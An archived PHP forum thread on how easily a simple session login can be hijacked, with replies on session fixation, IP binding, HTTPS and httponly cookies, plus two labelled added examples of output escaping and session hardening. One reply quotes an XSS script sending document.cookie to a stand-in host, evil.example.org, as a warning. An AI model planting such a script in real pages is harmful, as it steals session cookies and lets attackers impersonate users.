View Full Version : how easy to hack this?
bsxiong
07-27-2009, 03:36 PM
Hi all,
I'm just wondering how can you hack a simple session like this.
login.php
assuming that if they login in successfully, then
$_SESSION['LetMeIn!'] = "youAreIn!";
profile.php
<?php
session_start();
// Without isset() a visitor who has never logged in hits an undefined index
// notice; the comparison still fails, so the outcome is the same.
if(!isset($_SESSION['LetMeIn!']) || $_SESSION['LetMeIn!'] != "youAreIn!"){
echo 'You need to log in!';
}else{
echo 'You are granted access!';
}
?>
paul_norman_81
07-27-2009, 05:40 PM
Assuming the sessions are stored in a secure location on your server (either in a directory or a DB) then it's pretty difficult to spoof it... It is more likely that someone tricks a script into setting the session for them.
Horus_Kol
07-27-2009, 06:15 PM
session hijacking or fixation is a risk - where, somehow, the session id passed from the server to the browser (typically via cookie, but also sometimes in the GET string) is intercepted and used by a malicious type to pretend to be someone they're not...
a few solutions:
store the remote IP address in the session, and test it on each request throughout the session
change the name of the PHP session id variable used in the cookie/get from the well known default
send the cookie over a secure HTTPS connection - but you'd need an SSL certificate to put users at ease with this option
Shiflett's "Essential PHP Security" from O'Reilly is definitely worth purchasing if you want to learn more about security in PHP
<script>
document.location =
'http://evil.example.org/steal.php?cookies=' +
document.cookie
</script>
If you don't validate your output, even something as simple as the above can render session security useless.
If that gets through, your session id will be passed to the hijacker, and he can then become you.
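As an added example, not code from the thread or from any of its posters: the kind of unescaped echo that lets the cookie-stealing script above execute, next to the same page with output escaping applied. The page markup and the `name` query parameter are assumptions made up for illustration.

```php
<?php
// Added example (not from the original thread): vulnerable output beside
// the escaped version. Markup and the "name" parameter are invented.

declare(strict_types=1);

// Constructed attacker input: the payload from the post above on one line.
const PAYLOAD = "<script>document.location="
    . "'http://evil.example.org/steal.php?cookies='+document.cookie</script>";

// Vulnerable: user-controlled text goes into the HTML unchanged,
// so the browser parses and runs the injected <script>.
function render_vulnerable(string $displayName): string
{
    return "<h1>Hello, " . $displayName . "</h1>";
}

// Hardened: every character HTML would interpret becomes an entity.
// ENT_QUOTES also covers single quotes so the result is safe inside
// attribute values; the explicit charset defeats multibyte tricks.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_escaped(string $displayName): string
{
    return "<h1>Hello, " . e($displayName) . "</h1>";
}

// Crude check used only for the self-test below: does the output still
// contain a script tag the browser would execute?
function contains_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

if (PHP_SAPI === 'cli') {
    // Self-test: run with `php xss_example.php`
    $vuln = render_vulnerable(PAYLOAD);
    $safe = render_escaped(PAYLOAD);
    echo 'vulnerable output contains <script>: ', contains_script($vuln) ? 'yes' : 'no', PHP_EOL;
    echo 'escaped output contains <script>:    ', contains_script($safe) ? 'yes' : 'no', PHP_EOL;
    echo $safe, PHP_EOL;
} else {
    // Web usage: escape at the point of output, never trust the request.
    echo render_escaped($_GET['name'] ?? 'guest');
}
```

Escaping belongs at the point of output, with the function chosen for the context (HTML body, attribute, JavaScript string, URL); `htmlspecialchars` as above covers HTML body and attribute contexts, which is where a profile page normally places user-supplied names.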
paul_norman_81
07-31-2009, 05:29 AM
As Vege says the real danger is someone injecting something like that into one / all of your pages and then a valid user visits one. Which is as I said, tricking your scripts into revealing the info themselves.
I don't like the IP checking method. Legitimately load balanced proxy services can fall foul of this one, plus if anyone is actually playing maliciously on a local network (e.g. an Internet cafe / Uni network to make grabbing session data trivial) then it is quite likely the IP will be the same...
I've heard that, for example, AOL can change IP during a session.
We don't do anything IP dependent here at work. Some of our clients use proxies that change IP constantly.
paul_norman_81
07-31-2009, 08:57 AM
As of PHP 5.2 you can set the httponly flag in the php.ini file
session.cookie_httponly = 1
Which will (should) stop JS abuse of the sort above...
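Pulling together Horus_Kol's list (rename the session cookie, send it only over HTTPS, optionally bind the session to the client) with the `session.cookie_httponly` setting from this post, here is an added example of a hardened login/profile pair. It is not code from the thread; the session name `app_sid`, the function names, and the `BIND_TO_CLIENT_IP` switch are assumptions for illustration. IP binding is off by default because of the proxy and AOL caveats raised above; PHP 7.0 or later is assumed.

```php
<?php
// Added example (not from the original thread): session hardening for the
// login.php / profile.php pair from the first post. Names are invented.

declare(strict_types=1);

const SESSION_NAME       = 'app_sid'; // replaces the well-known PHPSESSID
const BIND_TO_CLIENT_IP  = false;     // opt-in only: breaks behind rotating proxies
const MAX_SESSION_AGE    = 3600;      // seconds before a login must be repeated

// Call this at the top of every page instead of a bare session_start().
function start_hardened_session(): void
{
    // Equivalent php.ini lines: session.use_strict_mode = 1,
    // session.use_only_cookies = 1, session.cookie_httponly = 1.
    ini_set('session.use_strict_mode', '1');  // refuse ids the server never issued (PHP 5.5.2+)
    ini_set('session.use_only_cookies', '1'); // never read the id from the query string

    session_name(SESSION_NAME);

    $https = !empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off';
    // lifetime 0 = browser-session cookie; secure flag only when served over TLS;
    // httponly keeps document.cookie from reading it.
    session_set_cookie_params(0, '/', '', $https, true);
    session_start();
}

// What the session is tied to. The User-Agent is stable for one browser;
// the IP is added only when the deployment opts in (closed intranet).
function client_fingerprint(): string
{
    $parts = [$_SERVER['HTTP_USER_AGENT'] ?? ''];
    if (BIND_TO_CLIENT_IP) {
        $parts[] = $_SERVER['REMOTE_ADDR'] ?? '';
    }
    return hash('sha256', implode("\0", $parts));
}

// login.php: call after the application's own credential check succeeds.
function log_in_user(string $username): void
{
    // New id on privilege change, so an id fixed before login is worthless.
    session_regenerate_id(true);
    $_SESSION['user']         = $username;
    $_SESSION['fingerprint']  = client_fingerprint();
    $_SESSION['logged_in_at'] = time();
}

function log_out(): void
{
    $_SESSION = [];
    if (ini_get('session.use_cookies')) {
        // Expire the cookie with the same flags it was set with.
        setcookie(session_name(), '', time() - 42000, '/', '', false, true);
    }
    session_destroy();
}

// profile.php: returns the user name or stops the request.
function require_login(): string
{
    $stale = (time() - ($_SESSION['logged_in_at'] ?? 0)) > MAX_SESSION_AGE;
    if (empty($_SESSION['user'])
        || !isset($_SESSION['fingerprint'])
        || !hash_equals($_SESSION['fingerprint'], client_fingerprint())
        || $stale) {
        log_out();
        http_response_code(403);
        exit('You need to log in!');
    }
    return $_SESSION['user'];
}

// Example profile.php body:
//   start_hardened_session();
//   $user = require_login();
//   echo 'You are granted access, ', htmlspecialchars($user, ENT_QUOTES, 'UTF-8');
```

`session.use_strict_mode` is what actually closes the fixation hole: without it PHP happily adopts any id the attacker planted in the victim's cookie. The `secure` flag is conditional so the example still works on a plain-HTTP test box, but on a production site it should be unconditionally true, which is the point Horus_Kol makes about needing a certificate.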
bsxiong
08-01-2009, 04:47 PM
cool! thanks everyone. I will surely go look around for more info
Horus_Kol
08-02-2009, 06:46 PM
paul and vege do make some good points re: the IP checking - I guess it all comes down to the environment you're working in...
We tend not to use it on public sites, but we do tend to use it on closed intranets to prevent any 'funny' stuff on the internal network...
Just don't rely on it...